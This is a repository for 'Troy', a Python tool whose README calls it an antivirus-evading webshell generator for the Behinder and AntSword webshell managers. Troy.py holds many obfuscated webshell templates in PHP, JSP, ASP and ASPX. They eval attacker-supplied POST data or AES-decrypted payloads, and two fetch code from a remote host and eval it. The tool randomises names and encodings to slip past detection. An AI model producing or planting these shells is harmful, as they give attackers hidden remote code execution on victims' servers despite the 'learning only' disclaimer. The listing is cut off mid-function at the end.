├── README.md
└── Troy.py


/README.md:
--------------------------------------------------------------------------------
 1 | # Troy
 2 | 仅供学习 请勿用作非法用途<br>
 3 | 
 4 | 
 5 | 特洛伊<br>
 6 | 更高级的免杀webshell生成工具 <br>
 7 | 适配冰蝎及蚁剑 <br>
 8 | 
 9 | 
10 | 


--------------------------------------------------------------------------------
/Troy.py:
--------------------------------------------------------------------------------
  1 | #coding:utf-8
  2 | import easygui as g
  3 | import sys
  4 | import random
  5 | import base64
  6 | import string
  7 | from random import shuffle
  8 | 
  9 | #php蚁剑
 10 | #换表base32
 11 | php_AntSword_baseX_shell = '''<?php
 12 | class {0}{15}
 13 |         public ${1} = null;
 14 |         public ${2} = null;
 15 |         function __construct(){15}
 16 |         $this->{1} = '{18}';
 17 |         if(md5($_GET["pass"])=="df24bfd1325f82ba5fd3d3be2450096e"){15}
 18 |         $this->{2} = @{3}($this->{1});
 19 |         ${2} = $this->{2};
 20 |         @eval/*1*/(${2}).{4};
 21 |     {16} 
 22 |         {16}{16} 
 23 | new {0}();
 24 | function {3}(${5}){15}
 25 |     ${7} = '{17}';
 26 |     ${5} = strval(${5});
 27 |     ${6} = str_split(${7});
 28 |     ${8} = array_flip(${6});
 29 |     if(!preg_match('/[a-zA-Z0-9]+/',${5})){15}
 30 |         return false;
 31 |     {16}
 32 |     ${9} = strlen(${5});
 33 |     ${11} = 0;
 34 |     ${10} = array();
 35 |     while(${11}<${9}){15}
 36 |         ${12} = decbin((${8}[${5}[${11}]]-${11}%2)/4);
 37 |         ${10}[] = str_pad(${12},4,'0',STR_PAD_LEFT);
 38 |         ++${11};
 39 |     {16}
 40 |     ${13} = '';
 41 |     ${10} = array_chunk(${10},2);
 42 |     foreach(${10} as ${14}){15}
 43 |         ${13} .= chr(bindec(join('',${14})));
 44 |     {16}
 45 |     return ${13};
 46 | {16}'''
 47 | 
 48 | php_AntSword_base32_shell = '''<?php
 49 | class {0}{1}
 50 |         public ${2} = null;
 51 |         public ${3} = null;
 52 |         function __construct(){1}
 53 |         $this->{2} = 'mv3gc3bierpvat2tkrnxuzlsn5ossoy';
 54 |         if(md5($_GET["pass"])=="df24bfd1325f82ba5fd3d3be2450096e"){1}
 55 |         $this->{3} = @{9}($this->{2});
 56 |         ${3}= $this->{3};
 57 |         @eval({5}.${3}.{5});
 58 |         {4}{4}{4}
 59 | new {0}();
 60 | function {6}(${7}){1}
 61 |     $BASE32_ALPHABET = 'abcdefghijklmnopqrstuvwxyz234567';
 62 |     ${8} = '';
 63 |     $v = 0;
 64 |     $vbits = 0;
 65 |     for ($i = 0, $j = strlen(${7}); $i < $j; $i++){1}
 66 |     $v <<= 8;
 67 |         $v += ord(${7}[$i]);
 68 |         $vbits += 8;
 69 |         while ($vbits >= 5) {1}
 70 |             $vbits -= 5;
 71 |             ${8} .= $BASE32_ALPHABET[$v >> $vbits];
 72 |             $v &= ((1 << $vbits) - 1);{4}{4}
 73 |     if ($vbits > 0){1}
 74 |         $v <<= (5 - $vbits);
 75 |         ${8} .= $BASE32_ALPHABET[$v];{4}
 76 |     return ${8};{4}
 77 | function {9}(${7}){1}
 78 |     ${8} = '';
 79 |     $v = 0;
 80 |     $vbits = 0;
 81 |     for ($i = 0, $j = strlen(${7}); $i < $j; $i++){1}
 82 |         $v <<= 5;
 83 |         if (${7}[$i] >= 'a' && ${7}[$i] <= 'z'){1}
 84 |             $v += (ord(${7}[$i]) - 97);
 85 |         {4} elseif (${7}[$i] >= '2' && ${7}[$i] <= '7') {1}
 86 |             $v += (24 + ${7}[$i]);
 87 |         {4} else {1}
 88 |             exit(1);
 89 |         {4}
 90 |         $vbits += 5;
 91 |         while ($vbits >= 8){1}
 92 |             $vbits -= 8;
 93 |             ${8} .= chr($v >> $vbits);
 94 |             $v &= ((1 << $vbits) - 1);{4}{4}
 95 |     return ${8};{4}
 96 | ?>'''
 97 | 
 98 | php_AntSword_http_shell = '''<?php 
 99 | class {0}{6}
100 |         public ${1} = '';
101 |         function __construct(){6}
102 |         ${2} = "http://192.168.150.133/1.txt";
103 |         //此文本内容为 eval($_POST[zero]);
104 |         ${3} = fopen(${2}, 'r');
105 |         stream_get_meta_data(${3});
106 |         while (!feof(${3})) {6}
107 |             ${4}.= fgets(${3}, 1024);
108 |         {5}
109 |         $this->{1} = ${4};
110 |         @eval($this->{1});
111 |         {5}{5}
112 | new {0}();
113 | ?>'''
114 | 
115 | php_AntSword_rot13_shell = '''<?php 
116 | 
117 | class {0}{1}
118 |         public ${3} = null;
119 |         public ${4} = null;
120 |         function __construct(){1}
121 |         if(md5($_GET["pass"])=="df24bfd1325f82ba5fd3d3be2450096e"){1}
122 |         $this->{3} = 'riny($_CBFG[mreb]);';
123 |         $this->{4} = @str_rot13($this->{3});
124 |         @eval($this->{4}.{5});
125 |         {2}{2}{2}
126 | new {0}();
127 | 
128 | ?>'''
129 | 
130 | 
131 | 
132 | php_AntSword_class_shell = '''<?php 
133 | class {0}
134 | {2}
135 |   public ${1} = '';
136 |   function __destruct(){2}
137 |     eval({5}."$this->{1}");
138 |   {3}
139 | {3}
140 | ${4} = new {0};
141 | ${4}->{1} = $_POST['zero'];
142 | function {6}(${1},${4}) {2}
143 |     echo {5};
144 |     echo {5};
145 |     echo {5};
146 |     echo {5};
147 |     echo {5};
148 |     echo {5};
149 |     echo {5};
150 |     echo {5};
151 | {3}
152 | ?>'''
153 | 
154 | 
155 | php_AntSword_kaisa_shell = '''<?php
156 | class {0}{12}
157 |         function __construct(){12}
158 |         ${1} = "http://192.168.150.133/2.txt";
159 |         //此txt文本内容为   3  
160 |         ${2} = fopen(${1}, 'r');
161 |         stream_get_meta_data(${2});
162 |         while (!feof(${2})) {12}
163 |             ${3}.= fgets(${2}, 1024);
164 |         {13}
165 |         $this->{4} = ${3};
166 |         $this->{5} = "bs^i%!\MLPQXwbolZ&8";
167 |         $this->{6} = @{7}($this->{5},$this->{4});
168 |         @eval($this->{6});
169 |         {13}{13}
170 | new {0}();
171 | 
172 | function {7}(${8},${4}) {12}
173 | ${9} = [];
174 | ${10} = '';
175 | ${11} = ${8};
176 | for ($i=0;$i<strlen(${11});$i++)
177 | {12}
178 |     ${9}[] = chr((ord(${11}[$i])+${4}));
179 | {13}
180 | ${10} = implode(${9});
181 | return ${10} ;
182 | {13}
183 | ?>'''
184 | #自定义加密1
185 | php_AntSword_myencry_shell = '''<?php
186 | $a = '11111111111111111111';
187 | $b = $a ^ $a ^$a;
188 | if(md5($_GET["pass"])=="df24bfd1325f82ba5fd3d3be2450096e"){
189 | eval($a ^ decrypt('nafFz2GGw7KEhbiLrsnVoY1Zbg==','1234') ^ $a);}
190 | function decrypt($data, $key) {
191 | $key = md5($key);
192 | $x = 0;
193 | $data = base64_decode($data);
194 | $len = strlen($data);
195 | $l = strlen($key);
196 | for ($i = 0; $i < $len; $i++) {
197 | if ($x == $l){ $x = 0;}
198 | $char .= substr($key, $x, 1);
199 | $x++;
200 | }
201 | for ($i = 0; $i < $len; $i++){
202 | if (ord(substr($data, $i, 1)) < ord(substr($char, $i, 1))){
203 | $str .= chr((ord(substr($data, $i, 1)) + 256) - ord(substr($char, $i, 1)));
204 | 
205 | }else{
206 | $str .= chr(ord(substr($data, $i, 1)) - ord(substr($char, $i, 1)));
207 |     }
208 | }
209 | return $str;}
210 | ?>'''
211 | 
212 | #自定义加密2
213 | php_AntSword_myencry_class_shell = '''<?php
214 | class env{
215 | function __construct(){
216 |     if(1){
217 |     $b = 'PKKZSczUsM8FAF6COeXWjP9pwShxF';
218 |     if(md5($_GET["pass"])=="df24bfd1325f82ba5fd3d3be2450096e"){
219 |     @@@@eval("/*aasa121224*/".decrypt($b)."/*sasa1212121212s121212*/");}}
220 | }}
221 | new env();
222 | function decrypt($data,$key='CHENI'){
223 |  $txt = urldecode($data); 
224 |  $chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"; 
225 |  $ch = $txt[0]; 
226 |  $nh = strpos($chars,$ch); 
227 |  $mdKey = md5($key.$ch); 
228 |  $mdKey = substr($mdKey,$nh%8, $nh%8+7); 
229 |  $txt = substr($txt,1); 
230 |  $tmp = ''; 
231 |  $i=0;$j=0; $k = 0; 
232 |  for ($i=0; $i<strlen($txt); $i++) { 
233 |   $k = $k == strlen($mdKey) ? 0 : $k; 
234 |   $j = strpos($chars,$txt[$i])-$nh - ord($mdKey[$k++]); 
235 |   while ($j<0) $j+=64; 
236 |   $tmp .= $chars[$j]; 
237 |  } 
238 |  return base64_decode($tmp); 
239 | }
240 | ?>'''
241 | #过AF马 
242 | php_AntSword_AF_shell='''
243 | <?=  
244 | $a =<<< aa
245 | assasssasssasssasssasssasssasssasssasssasssassss
246 | aa;
247 | eval/*12f*/(/*12f*/$_POST/*12f*/[zero])." /*sa11111*/"/*121?*///
248 | ."/* ##*/"; /*ff*///////////////////////////////////
249 | 
250 | ?><?<!-- asasas as asasa sas a-->?><!-- asasas as asasa sas a-->'''
251 | 
252 | 
253 | #php冰蝎
254 | 
255 | php_Behinder_1_shell = '''<?php
256 | @error_reporting(0);
257 | session_start();
258 |     ${0}="e45e329feb5d925b"; 
259 |     $_SESSION['k']=${0};
260 |     session_write_close();
261 |     ${1}="obuhaorpf5uw44dvoq";
262 |     ${2}='openssl';
263 |     ${3}={10}(${1});
264 |     ${4}=file_get_contents(${3});
265 |     ${5}=base64_decode('{19}');
266 |     if(!extension_loaded(${2}))
267 |     {17}
268 |         ${6}="base64_"."decode";
269 |         ${4}=${6}({16}.${4});
270 |         
271 |         for($i=0;$i<strlen(${4});$i++) {17}
272 |                  
273 |                 {18}
274 |     {18}
275 |     else
276 |     {17}
277 |         eval(${5});
278 |     {18}
279 |     ${7}=explode('|',${4});
280 |     ${8}=${7}[0];
281 |     ${9}=${7}[1];
282 |     class {15}{17}public function __invoke($p) {17}eval({16}.$p."");{18}{18}
283 |     @call_user_func(new {15}(),${9});
284 |     function {10}(${11}){17}
285 |     ${12} = '';
286 |     ${14} = 0;
287 |     ${13} = 0;
288 |     for ($i = 0, $j = strlen(${11}); $i < $j; $i++){17}
289 |         ${14} <<= 5;
290 |         if (${11}[$i] >= 'a' && ${11}[$i] <= 'z'){17}
291 |             ${14} += (ord(${11}[$i]) - 97);
292 |         {18} elseif (${11}[$i] >= '2' && ${11}[$i] <= '7') {17}
293 |             ${14} += (24 + ${11}[$i]);
294 |         {18} else {17}
295 |             exit(1);
296 |         {18}
297 |         ${13} += 5;
298 |         while (${13} >= 8){17}
299 |             ${13} -= 8;
300 |             ${12} .= chr(${14} >> ${13});
301 |             ${14} &= ((1 << ${13}) - 1);{18}{18}
302 |     return ${12};{18}
303 | 
304 | ?>
305 | 
306 | '''
307 | 
308 | php_Behinder_2_shell = '''<?php
309 | @error_reporting(0);
310 | session_start();
311 |     ${0}="e45e329feb5d925b"; 
312 |     $_SESSION['k']=${0};
313 |     session_write_close();
314 |     ${1}="obuhaorpf5uw44dvoq";
315 |     ${2}='openssl';
316 |     ${3}={5}(${1});
317 |     ${4}="file_get_"."contents";
318 |     ${6}=${4}(${3});
319 |     if(!extension_loaded(${2}))
320 |     {15}
321 |         ${7}="base64_"."decode";
322 |         ${6}=${7}({14}.${6});
323 |         
324 |         for($i=0;$i<strlen(${6});$i++) {15}
325 |                  
326 |             {16}
327 |     {16}
328 |     ${6}=openssl_decrypt(${6}, "AES128", ${0});
329 |     
330 |     ${8}=explode('|',${6});
331 |     ${9}=${8}[1];
332 |     class {10}{15}public function __invoke($p) {15}eval({14}.$p."");{16}{16}
333 |     @call_user_func(new {10}(),${9});
334 |     function {5}($LZCG){15}
335 |     ${11} = '';
336 |     ${13} = 0;
337 |     ${12} = 0;
338 |     for ($i = 0, $j = strlen($LZCG); $i < $j; $i++){15}
339 |         ${13} <<= 5;
340 |         if ($LZCG[$i] >= 'a' && $LZCG[$i] <= 'z'){15}
341 |             ${13} += (ord($LZCG[$i]) - 97);
342 |         {16} elseif ($LZCG[$i] >= '2' && $LZCG[$i] <= '7') {15}
343 |             ${13} += (24 + $LZCG[$i]);
344 |         {16} else {15}
345 |             exit(1);
346 |         {16}
347 |         ${12} += 5;
348 |         while (${12} >= 8){15}
349 |             ${12} -= 8;
350 |             ${11} .= chr(${13} >> ${12});
351 |             ${13} &= ((1 << ${12}) - 1);{16}{16}
352 |     return ${11};{16}
353 | 
354 | ?>
355 | '''
356 | 
357 | #jsp蚁剑
358 | 
359 | jsp_AntSword_uncode_shell = '''<%!class {2} extends ClassLoader{0} {2}(ClassLoader {3}){0} super({3}); {1}public Class g(byte []b){0} return super.d\uuuuuuuuuuuuuuuuuuuuuuuuuuuu0065fineClass(b,0,b.length); {1}{1}%><% String cls=request.g\u0065tParameter("zero");if(cls!=null){0} new {2}(this.\uuu0067etClass().\u0067\u0065t\u0043l\u0061ss\uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu004Coad\u0065\u0072()).g(new sun.misc.{4}{5}{6}{7}{8}{9}{10}{11}{12}{13}{14}{15}{16}().decodeBuffer(cls)).newInstance().\u0065quals(pageContext); {1}%>
360 | 
361 | 
362 | 
363 | 
364 | 
365 | 
366 | 
367 | 
368 | 
369 | '''
370 | 
371 | 
372 | #jsp冰蝎
373 | 
374 | jsp_Behinder_uncode_shell = '''<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class {0} extends ClassLoader{17}{0}(ClassLoader {1}){17}super({1});{18}public Class {3}(byte []b){17}return super.d\uuuuuuuuuuuuuuuuuuuuuuuuuuuu0065fineClass(b,0,b.length);{18}{18}%><%if (request.\u0067etMethod().\u0065quals("POST")){17}String {2}="e45e329feb5d925b";session.putValue("u",{2});Cipher {1}=Cipher.\u0067etInstanc\uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu0065("AES");{1}.init(2,new SecretKeySpec({2}.\u0067etBytes(),"AES"));new {0}(this.\u0067etClass().\u0067\u0065t\u0043l\u0061ss\uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu004Coad\u0065\u0072()).{3}({1}.doFinal(new sun.misc.{4}{5}{6}{7}{8}{9}{10}{11}{12}{13}{14}{15}{16}().d\u0065codeBuffer(request.\u0067etReader().readLine()))).newInstance().\u0065quals(pageContext);{18}%>
375 | 
376 | 
377 | 
378 | 
379 | 
380 | 
381 | 
382 | 
383 | '''
384 | 
385 | #asp蚁剑
386 | asp_AntSword_func_shell = '''<%
387 | <!--
388 | Function {0}():
389 |     {0} = request("zero")
390 | End Function
391 | Function {1}():
392 |     execUte({0}())REM )
393 | End Function
394 | {1}()
395 | -->
396 | %>'''
397 | 
398 | asp_AntSword_class_shell = '''<%
399 | Class {0}
400 |     public property let {1}({2})
401 |     exeCute({2})REM {3})
402 |     end property
403 | End Class
404 | 
405 | Set a= New {0}
406 | a.{1}= request("zero")
407 | %>'''
408 | 
409 | asp_AntSword_enc_shell = '''<%
410 | eXecUTe({0}("92002200F60027005600A7002200820047003700560057001700560027000200C60016006700560077007600"))REM )
411 | function {0}(text)
412 |     const {4}="gw"
413 |     dim {1} : {1}=text
414 |     dim {2}
415 |     dim {3} : {3}=strreverse({1}) 
416 |     for i=1 to len({3}) step 4
417 |         {2}={2} & ChrW(cint("&H" & mid({3},i,4)))
418 |     next
419 |     {0}=mid({2},len({4})+1,len({1})-len({4}))
420 | end function
421 | %>'''
422 | #asp冰蝎
423 | 
424 | asp_Behinder_1_shell = '''<%
425 | Response.CharSet = "UTF-8" 
426 | {0}="e45e329feb5d925b" 
427 | Session("k")={0}
428 | {1}=Request.TotalBytes
429 | {2}=Request.BinaryRead({1})
430 | For i=1 To {1}
431 | 
432 | {4}={4}&Chr(1  Xor ascb(midb({2},i,1)) Xor Asc(Mid({0},(i and 15)+1,1)) Xor 1)
433 | Next
434 | %><%'{3}%><%execute({4})
435 | %>'''
436 | 
437 | asp_Behinder_2_shell = '''<%
438 | Response.CharSet = "UTF-8" 
439 | {0}="e45e329feb5d925b" 
440 | Session("k")={0}
441 | {1}=Request.TotalBytes
442 | {2}=Request.BinaryRead({1})
443 | For i=1 To {1}
444 | {3}=ascb(midb({2},i,1)) Xor Asc(Mid({0},(i and 15)+1,1))
445 | {4}={4}&Chr({3})
446 | Next
447 | %><%'{5}%><%execute({4})
448 | %>'''
449 | 
450 | asp_Behinder_3_shell = '''<%
451 | Response.CharSet = "UTF-8" 
452 | {0}="e45e329feb5d925b" 
453 | Session("k")={0}
454 | {1}=Request.TotalBytes
455 | {2}=Request.BinaryRead({1})
456 | For i=1 To {1}
457 | {3}=ascb(midb({2},i,1)) Xor Asc(Mid({0},(i and 15)+1,1))
458 | {4}={4}&Chr({3})
459 | Next
460 | execute({4})REM )
461 | %>'''
462 | #aspx蚁剑
463 | 
464 | aspx_AntSword_func_shell = '''<%@ Page Language="Jscript" Debug=true%>
465 | <%
466 | function {2}()
467 | {6}
468 | 
469 | {7}
470 | function {3}()
471 | {6}
472 | var {0}=Request.Form["zero"];
473 | var {1}="unsaf",{5}="e",{4}={1}+{5};
474 | eval({0},{4});
475 | {7}
476 | {3}()
477 | %>'''
478 | 
479 | #aspx冰蝎
480 | aspx_Behinder_1_shell = '''<%@Language=CSharp%>{3};{4}<%@Import Namespace="System.Reflection"%><%{5}Session.Add(@"k","e45e329feb5d925b");byte[] {0} = Encoding.Default.GetBytes(Session[0] + ""),{1} = Request.BinaryRead(Request.ContentLength);Assembly.Load(new System.Security.Cryptography.RijndaelManaged().CreateDecryptor({0}, {0}).TransformFinalBlock{2}({1}, 0, {1}.Length)).{2}CreateInstance("U").Equals{2}(this);%>
481 | 
482 | 
483 | 
484 | 
485 | 
486 | '''
487 | 
488 | aspx_Behinder_2_shell = '''<%@Import Namespace="System.Reflection"%><%{3}Session.Add(@"k","e45e329feb5d925b");byte[] {0} = Encoding.Default.GetBytes(Session[0] + ""),{1} = Request.BinaryRead(Request.ContentLength);Assembly.Load(new System.Security.Cryptography.RijndaelManaged().CreateDecryptor({0}, {0}).TransformFinalBlock{2}({1}, 0, {1}.Length)).{2}CreateInstance("U").Equals{2}(this);%><%@ Page Language="CSharp" %>;
489 | 
490 | 
491 | 
492 | 
493 | 
494 | '''
495 | 
496 | def random_keys(len):
497 |     str = '012345678abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
498 |     return ''.join(random.sample(str,len))
499 | 
500 | def random_name(len):
501 |     str = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
502 |     return ''.join(random.sample(str,len))  
503 | 
504 | def random_base_key():
505 |     s ='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
506 |     # 将字符串转换成列表
507 |     str_list = list(s)
508 |     # 调用random模块的shuffle函数打乱列表
509 |     shuffle(str_list)
510 |     # 将列表转字符串
511 |     return ''.join(str_list)
512 | 
513 | #换表base62
514 | letters=random_base_key()
515 | def encryption(inputString):
516 |     # 将输入字符转化为二进制
517 |     
518 |     ascii = ['{:0>8}'.format(str(bin(ord(i))).replace('0b', ''))
519 |              for i in inputString]
520 |     #连接所有二进制
521 |     joinData = ''.join(ascii)
522 |     #四个一组进行分组
523 |     num = len(joinData)
524 |     numList=[]
525 |     for z in range(0,num):
526 |         if int(z%4) == 0:
527 |             numList.append(z)
528 |         
529 |     joinDataList = [joinData[x:x+4] for x in numList]
530 |     #二进制转换为十进制
531 |     joinDataList = [int(x, 2) for x in joinDataList]
532 |     
533 |     #十进制乘4加自增变量取2余数并循环
534 |     findList=[]
535 |     i=0
536 |     for q,y in enumerate(joinDataList):
537 |         if q % 2 == 0 :
538 |             findList.append(int(y*4)+int(0))
539 |         else:
540 |             findList.append(int(y*4)+int(1))
541 | 
542 |     outputS = ''.join([letters[x] for x in findList])
543 |     return outputS
544 | # php蚁剑
545 | # 
546 | def build_php_AntSword_baseX_shell():
547 |     #18个变量
548 |     str1 = "eval($_POST[zero]);"
549 |     var0 = random_name(4)
550 |     var1 = random_name(4)
551 |     var2 = random_name(4)
552 |     var3 = random_name(4)
553 |     var4 = "\"/*"+random_keys(7)+"*/\""
554 |     var5 = random_name(4)
555 |     var6 = random_name(4)
556 |     var7 = random_name(4)
557 |     var8 = random_name(4)
558 |     var9 = random_name(4)
559 |     var10 = random_name(4)
560 |     var11 = random_name(4)
561 |     var12 = random_name(4)
562 |     var13 = random_name(4)
563 |     var14 = random_name(4)
564 |     var15 = '''{'''
565 |     var16 = '''}'''
566 |     var17 = letters
567 |     var18 = encryption(str1)
568 |     shellc = php_AntSword_baseX_shell.format(var0,var1,var2,var3,var4,var5,var6,var7,var8,var9,var10,var11,var12,var13,var14,var15,var16,var17,var18)
569 |     return shellc
570 | 
571 | def build_php_AntSword_base32_shell():
572 |     className = random_name(4)
573 |     lef = '''{'''
574 |     parameter1 = random_name(4)
575 |     parameter2 = random_name(4)
576 |     rig = '''}'''
577 |     disrupt = "\"/*"+random_keys(7)+"*/\""
578 |     fun1 = random_name(4)
579 |     fun1_vul = random_name(4)
580 |     fun1_ret = random_name(4)
581 |     fun2 = random_name(4)
582 |     shellc = php_AntSword_base32_shell.format(className,lef,parameter1,parameter2,rig,disrupt,fun1,fun1_vul,fun1_ret,fun2)
583 |     return shellc
584 | 
585 | def build_php_AntSword_http_shell():
586 |     className = random_name(4)
587 |     lef = '''{'''
588 |     rig = '''}'''
589 |     parameter1 = random_name(4)
590 |     parameter2 = random_name(4)
591 |     parameter3 = random_name(4)
592 |     parameter4 = random_name(4)
593 |     shellc = php_AntSword_http_shell.format(className,parameter1,parameter2,parameter3,parameter4,rig,lef)
594 |     return shellc
595 | 
596 | def build_php_AntSword_rot13_shell():
597 |     className = random_name(4)
598 |     lef = '''{'''
599 |     rig = '''}'''
600 |     parameter1 = random_name(4)
601 |     parameter2 = random_name(4)
602 |     parameter3 = random_name(4)
603 |     disrupt = "\"/*"+random_keys(7)+"*/\""
604 |     shellc = php_AntSword_rot13_shell.format(className,lef,rig,parameter1,parameter2,disrupt)
605 |     return shellc
606 | 
607 | def build_php_AntSword_class_shell():
608 |     className = random_name(4)
609 |     lef = '''{'''
610 |     rig = '''}'''
611 |     parameter1 = random_name(4)
612 |     parameter2 = random_name(4)
613 |     fun = random_name(4)
614 |     disrupt = "\"/*"+random_keys(7)+"*/\""
615 |     shellc = php_AntSword_class_shell.format(className,parameter1,lef,rig,parameter2,disrupt,fun)
616 |     return shellc
617 | 
618 | def build_php_AntSword_kaisa_shell():
619 |     className = random_name(4)
620 |     lef = '''{'''
621 |     rig = '''}'''
622 |     parameter1 = random_name(4)
623 |     parameter2 = random_name(4)
624 |     parameter3 = random_name(4)
625 |     parameter4 = random_name(4)
626 |     parameter5 = random_name(4)
627 |     parameter6 = random_name(4)
628 |     parameter7 = random_name(4)
629 |     parameter8 = random_name(4)
630 |     parameter9 = random_name(4)
631 |     parameter10 = random_name(4)
632 |     fun = random_name(5)
633 |     shellc = php_AntSword_kaisa_shell.format(className,parameter1,parameter2,parameter3,parameter4,parameter5,parameter6,fun,parameter7,parameter8,parameter9,parameter10,lef,rig)
634 |     return shellc
635 | 
636 | #php冰蝎
637 | def build_php_Behinder_1_shell():
638 | 
639 |     parameter0 = random_name(4)
640 |     parameter1 = random_name(4)
641 |     parameter2 = random_name(4)
642 |     parameter3 = random_name(4)
643 |     parameter4 = random_name(4)
644 |     parameter5 = random_name(4)
645 |     parameter6 = random_name(4)
646 |     parameter7 = random_name(4)
647 |     parameter8 = random_name(4)
648 |     parameter9 = random_name(4)
649 |     parameter10 = random_name(4)
650 |     parameter11 = random_name(4)
651 |     parameter12 = random_name(4)
652 |     parameter13 = random_name(4)
653 |     parameter14 = random_name(4)
654 |     disrupt = "\"/*"+random_keys(7)+"*/\""
655 |     lef = '''{'''
656 |     rig = '''}'''
657 |     parameter15 = random_name(4)
658 |     code = code = base64.b64encode("$"+str(parameter4)+"=openssl_decrypt($"+str(parameter4)+", 'AES128', $"+str(parameter0)+");")
659 |     shellc = php_Behinder_1_shell.format(parameter0,parameter1,parameter2,parameter3,parameter4,parameter5,parameter6,parameter7,parameter8,parameter9,parameter10,parameter11,parameter12,parameter13,parameter14,parameter15,disrupt,lef,rig,code)
660 |     return shellc
661 | 
662 | def build_php_Behinder_2_shell():
663 |     parameter0 = random_name(4)
664 |     parameter1 = random_name(4)
665 |     parameter2 = random_name(4)
666 |     parameter3 = random_name(4)
667 |     parameter4 = random_name(4)
668 |     parameter5 = random_name(4)
669 |     parameter6 = random_name(4)
670 |     parameter7 = random_name(4)
671 |     parameter8 = random_name(4)
672 |     parameter9 = random_name(4)
673 |     parameter10 = random_name(4)
674 |     parameter11 = random_name(4)
675 |     parameter12 = random_name(4)
676 |     parameter13 = random_name(4)
677 |     disrupt = "\"/*"+random_keys(7)+"*/\""
678 |     lef = '''{'''
679 |     rig = '''}'''
680 |     shellc = php_Behinder_2_shell.format(parameter0,parameter1,parameter2,parameter3,parameter4,parameter5,parameter6,parameter7,parameter8,parameter9,parameter10,parameter11,parameter12,parameter13,disrupt,lef,rig)
681 |     return shellc
682 | 
683 | #jsp蚁剑
684 | 
685 | def build_jsp_AntSword_uncode_shell():
686 |     arr1 = ['\u0042','B']
687 |     arr2 = ['\u0041','A']
688 |     arr3 = ['\u0053','S']
689 |     arr4 = ['\u0045','E']
690 |     arr5 = ['\u0036','6']
691 |     arr6 = ['\u0034','4']
692 |     arr7 = ['\u0044','D']
693 |     arr8 = ['\u0065','e']
694 |     arr9 = ['\u0063','c']
695 |     arr10 = ['\u006f','o']
696 |     arr11 = ['\u0064','d']
697 |     arr12 = ['\u0065','e']
698 |     string1 = '\uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu0072'
699 | 
700 |     lef = '''{'''
701 |     rig = '''}'''
702 |     var1 = random_name(4)
703 |     var2 = random_name(4)
704 |     var3 = random.choice(arr1)
705 |     var4 = random.choice(arr2)
706 |     var5 = random.choice(arr3)
707 |     var6 = random.choice(arr4)
708 |     var7 = random.choice(arr5)
709 |     var8 = random.choice(arr6)
710 |     var9 = random.choice(arr7)
711 |     var10 = random.choice(arr8)
712 |     var11 = random.choice(arr9)
713 |     var12 = random.choice(arr10)
714 |     var13 = random.choice(arr11)
715 |     var14 = random.choice(arr12)
716 |     var15 = string1
717 |     shellc = jsp_AntSword_uncode_shell.format(lef,rig,var1,var2,var3,var4,var5,var6,var7,var8,var9,var10,var11,var12,var13,var14,var15)
718 |     return shellc
719 | 
720 | 
721 | #jsp冰蝎
722 | 
723 | def build_jsp_Behinder_uncode_shell():
724 |     arr1 = ['\u0042','B']
725 |     arr2 = ['\u0041','A']
726 |     arr3 = ['\u0053','S']
727 |     arr4 = ['\u0045','E']
728 |     arr5 = ['\u0036','6']
729 |     arr6 = ['\u0034','4']
730 |     arr7 = ['\u0044','D']
731 |     arr8 = ['\u0065','e']
732 |     arr9 = ['\u0063','c']
733 |     arr10 = ['\u006f','o']
734 |     arr11 = ['\u0064','d']
735 |     arr12 = ['\u0065','e']
736 |     string1 = '\uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu0072'
737 | 
738 |     lef = '''{'''
739 |     rig = '''}'''
740 |     parameter0 = random_name(4)
741 |     parameter1 = random_name(4)
742 |     parameter2 = random_name(4)
743 |     parameter3 = random_name(4)
744 |     var3 = random.choice(arr1)
745 |     var4 = random.choice(arr2)
746 |     var5 = random.choice(arr3)
747 |     var6 = random.choice(arr4)
748 |     var7 = random.choice(arr5)
749 |     var8 = random.choice(arr6)
750 |     var9 = random.choice(arr7)
751 |     var10 = random.choice(arr8)
752 |     var11 = random.choice(arr9)
753 |     var12 = random.choice(arr10)
754 |     var13 = random.choice(arr11)
755 |     var14 = random.choice(arr12)
756 |     var15 = string1
757 |     shellc = jsp_Behinder_uncode_shell.format(parameter0,parameter1,parameter2,parameter3,var3,var4,var5,var6,var7,var8,var9,var10,var11,var12,var13,var14,var15,lef,rig)
758 |     return shellc
759 | 
760 | 
761 | #asp蚁剑
762 | def build_asp_AntSword_func_shell():
763 |     FunctionName = random_name(4)
764 |     parameter = random_name(4)
765 |     shellc = asp_AntSword_func_shell.format(FunctionName,parameter)
766 |     return shellc
767 | 
768 | def build_asp_AntSword_class_shell():
769 |     className = random_name(5)
770 |     func = random_name(5)
771 |     parameter = random_name(5)
772 |     rand = random_name(5)
773 |     shellc = asp_AntSword_class_shell.format(className,func,parameter,rand)
774 |     return shellc
775 | def build_asp_AntSword_enc_shell():
776 |     func = random_name(5)
777 |     var1 = random_name(4)
778 |     var2 = random_name(4)
779 |     var3 = random_name(4)
780 |     var4 = random_name(4)
781 |     shellc = asp_AntSword_enc_shell.format(func,var1,var2,var3,var4)
782 |     return shellc
783 | #asp冰蝎
784 | def build_asp_Behinder_1_shell():
785 |     parameter0 = random_name(5)
786 |     parameter1 = random_name(5)
787 |     parameter2 = random_name(5)
788 |     rand = random_keys(7)
789 |     parameter3 = random_name(5)
790 |     shellc = asp_Behinder_1_shell.format(parameter0,parameter1,parameter2,rand,parameter3)
791 |     return shellc
792 | 
793 | def build_asp_Behinder_2_shell():
